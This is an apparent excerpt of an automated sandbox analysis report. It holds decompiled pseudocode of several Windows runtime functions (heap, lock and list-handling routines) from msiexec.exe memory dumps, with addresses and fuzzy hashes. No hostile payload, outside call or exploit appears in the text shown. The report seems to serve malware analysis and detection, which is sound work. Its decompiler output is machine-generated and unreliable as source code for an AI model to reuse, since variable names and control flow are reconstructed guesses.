				_t40 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                              0x04d3fd9b
                              0x04d3fda0
                              0x04d3fda1
                              0x04d3fdab
                              0x04d3fdad
                              0x04d3fdb0
                              0x04d3fdb8
                              0x04d3fe0f
                              0x04d3fde6
                              0x04d3fde9
                              0x04d3fdec
                              0x04d7c0c0
                              0x04d3fdfe
                              0x04d3fe06
                              0x04d3fe06
                              0x04d7c0c8
                              0x04d3fe2d
                              0x04d3fe2d
                              0x00000000
                              0x04d3fe2d
                              0x04d7c0d1
                              0x04d7c0e0
                              0x04d7c0e5
                              0x04d7c0e5
                              0x04d7c0e8
                              0x00000000
                              0x04d7c0e8
                              0x04d3fdf4
                              0x00000000
                              0x00000000
                              0x04d3fdf6
                              0x04d3fdfa
                              0x04d3fe1a
                              0x04d3fe1f
                              0x04d3fe1f
                              0x04d3fdfc
                              0x00000000
                              0x04d3fdfc
                              0x04d3fdcc
                              0x04d3fdd0
                              0x04d3fe26
                              0x00000000
                              0x04d3fe26
                              0x04d3fdd8
                              0x04d3fddb
                              0x04d3fddd
                              0x04d3fde0
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                              • Instruction ID: ccf60baa95e547115ddd8099e9f96e95341d040d751c6499c1fbea870cac7615
                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                              • Instruction Fuzzy Hash: C8217972A40A48DFD731CF4AD644A66B7E5FB94B12F24816EE98997620E734FC00DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D09240 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E04D09240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4ddf708);
				E04D5D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04D495D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04D495D0();
				_t33 =  *0x4df84c4; // 0x0
				L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4df84c4; // 0x0
				L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4df84c4; // 0x0
				E04D22280(L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4df86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04D495D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04D495D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04D09325();
					_t50 =  *0x4df84c4; // 0x0
					return E04D5D0D1(L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                              0x04d09240
                              0x04d09242
                              0x04d09247
                              0x04d0924c
                              0x04d0924e
                              0x04d09255
                              0x04d09257
                              0x04d0925a
                              0x04d0925f
                              0x04d0925f
                              0x04d09266
                              0x04d09271
                              0x04d09276
                              0x04d09279
                              0x04d0927e
                              0x04d09295
                              0x04d0929a
                              0x04d092b1
                              0x04d092b6
                              0x04d092d7
                              0x04d092dc
                              0x04d092e0
                              0x04d092e6
                              0x04d092e8
                              0x04d092ee
                              0x04d09332
                              0x04d09333
                              0x04d09337
                              0x04d09338
                              0x04d0933a
                              0x04d0933a
                              0x04d0933d
                              0x04d09342
                              0x04d09342
                              0x04d09345
                              0x04d09349
                              0x04d0934e
                              0x04d09352
                              0x04d09357
                              0x04d092f4
                              0x04d092f4
                              0x04d092f6
                              0x04d092f9
                              0x04d09300
                              0x04d09306
                              0x04d09324
                              0x04d09324

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 475f5aa562678aba1d0ea37ae31cfb11229e74dd3b950648932ee37478be69f5
                              • Instruction ID: bc85423b7b85832965d04d3d5ef7c39f4dd4f63f00920eff8d69f901463be5d1
                              • Opcode Fuzzy Hash: 475f5aa562678aba1d0ea37ae31cfb11229e74dd3b950648932ee37478be69f5
                              • Instruction Fuzzy Hash: 60211671241640DFD721EF28CA50B5AB7B9FF18708F1485A8E049876B2CB34F941DB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3B390 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              C-Code - Quality: 54%
                              			E04D3B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04D22280(_t12, 0x4df8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04D400C2(0x4df8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                              0x04d3b395
                              0x04d3b3a2
                              0x04d3b3a5
                              0x04d3b3aa
                              0x04d3b3b2
                              0x04d3b3ba
                              0x04d3b3bd
                              0x04d3b3c0
                              0x04d3b3c4
                              0x04d3b3c9
                              0x04d7a3e9
                              0x04d7a3ed
                              0x04d7a3f0
                              0x04d7a3ff
                              0x04d7a403
                              0x04d7a409
                              0x00000000
                              0x00000000
                              0x04d7a40b
                              0x04d7a40b
                              0x04d7a40f
                              0x04d7a415
                              0x04d7a423
                              0x04d7a423
                              0x04d7a415
                              0x04d3b3d1
                              0x04d3b3e8
                              0x04d3b3e8
                              0x04d3b3d9

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 261126b98da6f2cd19269f0412b85b83cf57003f4bf17a0718ee9cf6670bfb2f
                              • Instruction ID: dac828920e81c9e8be087718d2416f0dfcf92df48657d1248a1ee7dfeb5d93d7
                              • Opcode Fuzzy Hash: 261126b98da6f2cd19269f0412b85b83cf57003f4bf17a0718ee9cf6670bfb2f
                              • Instruction Fuzzy Hash: 071148333051209BDF299E548D81A2F7266EBC5334B29012EEA1697380EA32BC02D691
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D94257 Relevance: .1, Instructions: 60COMMON
                              Download Yara Rule
                              C-Code - Quality: 90%
                              			E04D94257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4de08d0);
				E04D5D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04D941E8(__ebx, __edi, __ecx, _t39);
				E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4df87e4;
					_t18 =  *0x4df87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4df5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4df87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4df87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04D07055(_t31 + 0xfffffff8);
								_t24 =  *0x4df87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4df87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4df5cd0;
				if( *0x4df5cd0 <= 0) {
					L04D07055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4df87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4df87e8 = _t30;
						 *0x4df87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04D5D0D1(L04D94320());
			}















                              0x04d94257
                              0x04d94257
                              0x04d94257
                              0x04d94259
                              0x04d9425e
                              0x04d94263
                              0x04d94265
                              0x04d94273
                              0x04d94278
                              0x04d9427c
                              0x04d9427f
                              0x04d94281
                              0x04d94287
                              0x04d942d7
                              0x04d942d7
                              0x04d942da
                              0x04d9428d
                              0x04d9428d
                              0x04d9428f
                              0x04d94292
                              0x04d94297
                              0x04d9429c
                              0x04d942a0
                              0x04d942a6
                              0x04d942a8
                              0x04d942ae
                              0x04d942b3
                              0x00000000
                              0x04d942ba
                              0x04d942ba
                              0x04d942bf
                              0x04d942c5
                              0x04d942ca
                              0x04d942cf
                              0x04d942d0
                              0x00000000
                              0x04d942d0
                              0x04d942b3
                              0x00000000
                              0x04d942a6
                              0x04d9429c
                              0x04d942dc
                              0x04d942dc
                              0x04d942e3
                              0x04d94309
                              0x04d942e5
                              0x04d942e5
                              0x04d942e8
                              0x04d942ee
                              0x04d942f0
                              0x00000000
                              0x04d942f2
                              0x04d942f2
                              0x04d942f4
                              0x04d942f7
                              0x04d942f9
                              0x04d94300
                              0x04d94300
                              0x04d942f0
                              0x04d9430e
                              0x04d9431f

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aa04a975315c83ee4891a0e99a30c34e14d19e7c33c7b5dc630b3ce76414a545
                              • Instruction ID: 10f14ef817ad1307d17277a1057f073f3eb7d55c72e6bbbb42afaf8e0ea44a20
                              • Opcode Fuzzy Hash: aa04a975315c83ee4891a0e99a30c34e14d19e7c33c7b5dc630b3ce76414a545
                              • Instruction Fuzzy Hash: 20213870605B01DFDF29EF66D060614BBF1FB45318B10826AD115CB392EB35BC42DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D846A7 Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E04D846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04D4F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04D3D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04D277F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                              0x04d846b7
                              0x04d846ba
                              0x04d846c5
                              0x04d846c8
                              0x04d846d0
                              0x04d846d4
                              0x04d846e6
                              0x04d846e9
                              0x04d846f4
                              0x04d846ff
                              0x04d84705
                              0x04d84706
                              0x04d8470c
                              0x04d84713
                              0x04d8471b
                              0x04d84723
                              0x04d84725
                              0x04d846d6
                              0x04d846d9
                              0x04d846db
                              0x04d846db
                              0x04d84732

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                              • Instruction ID: 96ac13dd39b43711785944420f262e3a87ea85e6f9e7d81f1d2faabbb68871b6
                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                              • Instruction Fuzzy Hash: 3211E572604208BBDB159F5CD9808BEB7B9EF95304F10806EF984C7350DA319D55D7A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D32397 Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              C-Code - Quality: 34%
                              			E04D32397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4df848c != 0) {
					L04D2FAD0(0x4df8610);
					if( *0x4df848c == 0) {
						E04D2FA00(0x4df8610, _t19, _t27, 0x4df8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04D32581(0x4df8610, 0x4ce50a0, _t26, _t27, _t28);
						E04D2FA00(0x4df8610, 0x4ce50a0, _t27, 0x4df8610);
					}
				} else {
					L1:
					_t11 =  *0x4df8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04D44886(0x4ce1088, 1, 0x4df8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04D32581(0x4df8610, (_t11 << 4) + 0x4ce5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                              0x04d323b0
                              0x04d323b6
                              0x04d32409
                              0x04d32415
                              0x04d75ae9
                              0x00000000
                              0x04d3241b
                              0x04d3241b
                              0x04d3241d
                              0x04d32427
                              0x04d3242e
                              0x04d32430
                              0x04d32430
                              0x04d323b8
                              0x04d323b8
                              0x04d323b8
                              0x04d323bf
                              0x04d323fc
                              0x04d323fc
                              0x04d323c1
                              0x04d323c3
                              0x04d323d0
                              0x04d323d8
                              0x04d323d8
                              0x04d323dc
                              0x04d323de
                              0x04d323e1
                              0x04d323e1
                              0x04d323ec

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96dc39dd0bc6c1f1f77ecd3fc397cf6bb1df972f7ee003a45f8fd006d4e38866
                              • Instruction ID: 56257775c2241649a196e8d6c892e0a020836b0eae7f1aa491b0fa7c888a9e99
                              • Opcode Fuzzy Hash: 96dc39dd0bc6c1f1f77ecd3fc397cf6bb1df972f7ee003a45f8fd006d4e38866
                              • Instruction Fuzzy Hash: E1114271B0031077F730AB299C50B15B6D9FB50B2AF14445EF601A7240D774F8409765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D437F5 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E04D437F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04D22280(_t6, 0x4df8550);
				}
				_t29 = E04D4387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04D1FFB0(0x4df8550, _t27, 0x4df8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                              0x04d437fa
                              0x04d437fc
                              0x04d43805
                              0x04d43808
                              0x04d43808
                              0x04d43814
                              0x04d43818
                              0x04d43846
                              0x04d43848
                              0x04d4384b
                              0x04d4384b
                              0x04d43852
                              0x00000000
                              0x04d43854
                              0x04d43856
                              0x00000000
                              0x00000000
                              0x04d43863
                              0x00000000
                              0x04d43863
                              0x04d4381a
                              0x04d4381a
                              0x04d4381f
                              0x04d4386e
                              0x04d4386e
                              0x04d43871
                              0x04d43873
                              0x04d43873
                              0x04d43868
                              0x00000000
                              0x04d43868
                              0x04d43821
                              0x04d43826
                              0x00000000
                              0x00000000
                              0x04d43828
                              0x04d4382a
                              0x04d43841
                              0x00000000
                              0x04d43841

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ed638fafe3ab19df65b8ca3a295c87a847b9c384d8104b6883b81e0282253c11
                              • Instruction ID: b6cb56e472cf2afe024d26a830606f7ded1841eafdccbd3bdf37aeef585393a6
                              • Opcode Fuzzy Hash: ed638fafe3ab19df65b8ca3a295c87a847b9c384d8104b6883b81e0282253c11
                              • Instruction Fuzzy Hash: 26018472B056109BD7379F1D9940A2AFBA6EFC5B7471A4069ED499B311D730F801C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0C962 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              C-Code - Quality: 42%
                              			E04D0C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4dfd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04D1EEF0(0x4df70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04D8F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04D1EB70(_t29, 0x4df70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04D4B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04D8F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4df70c0; // 0x0
					while(_t38 != 0x4df70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4dfb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                              0x04d0c96a
                              0x04d0c974
                              0x04d0c988
                              0x04d0c98a
                              0x04d77c9d
                              0x04d77c9f
                              0x04d77ca4
                              0x04d77cae
                              0x04d77cf0
                              0x04d77cf5
                              0x04d77cfa
                              0x04d0c992
                              0x04d0c996
                              0x04d0c997
                              0x04d0c998
                              0x04d0c9a3
                              0x04d0c9a3
                              0x04d77cb0
                              0x04d77cb7
                              0x04d77cbb
                              0x00000000
                              0x00000000
                              0x04d77cbd
                              0x04d77ce8
                              0x04d77cc5
                              0x04d77cc8
                              0x04d77cca
                              0x04d77cd0
                              0x04d77cd6
                              0x04d77cde
                              0x04d77ce4
                              0x04d77ce4
                              0x04d77cd0
                              0x00000000
                              0x04d77ce8
                              0x04d0c990
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0dcfe1a2c1a0fe643a67ce2dac8c3665d47a486b107336e3cacc0088d632b87a
                              • Instruction ID: 35268bef60719c1dbe6a958dab0ab0b6010f8cf3ffa82926858b1a2764035f20
                              • Opcode Fuzzy Hash: 0dcfe1a2c1a0fe643a67ce2dac8c3665d47a486b107336e3cacc0088d632b87a
                              • Instruction Fuzzy Hash: 4E11CE32700646ABD720AF68DD95A6ABBF5FF88614B00093DED4587690EB60FC54CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3002D Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D3002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04D27D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04D27D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04D27D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04D27D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                              0x04d30032
                              0x04d30037
                              0x04d30043
                              0x04d74b3a
                              0x04d30049
                              0x04d30049
                              0x04d30049
                              0x04d3004e
                              0x04d30053
                              0x04d74b48
                              0x04d74b5a
                              0x04d74b4a
                              0x04d74b53
                              0x04d74b53
                              0x04d74b5f
                              0x00000000
                              0x04d74b61
                              0x00000000
                              0x04d74b61
                              0x04d30059
                              0x04d30059
                              0x04d30060
                              0x04d74b6f
                              0x04d74b6f
                              0x04d30069
                              0x04d74b83
                              0x00000000
                              0x00000000
                              0x04d74b90
                              0x04d74b9b
                              0x04d74b9b
                              0x04d74ba4
                              0x00000000
                              0x00000000
                              0x04d74baa
                              0x00000000
                              0x04d3006f
                              0x04d3006f
                              0x00000000
                              0x04d3006f
                              0x04d30069

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                              • Instruction ID: eafb4f570e1fabb792c046296a78cb37c163652a62d09d56af494ce9598a547e
                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                              • Instruction Fuzzy Hash: 3C11AD32706681CFE7239B28CE55B3577A4FB41B5DF0900A1DD448B692F768FC41C660
                              Uniqueness

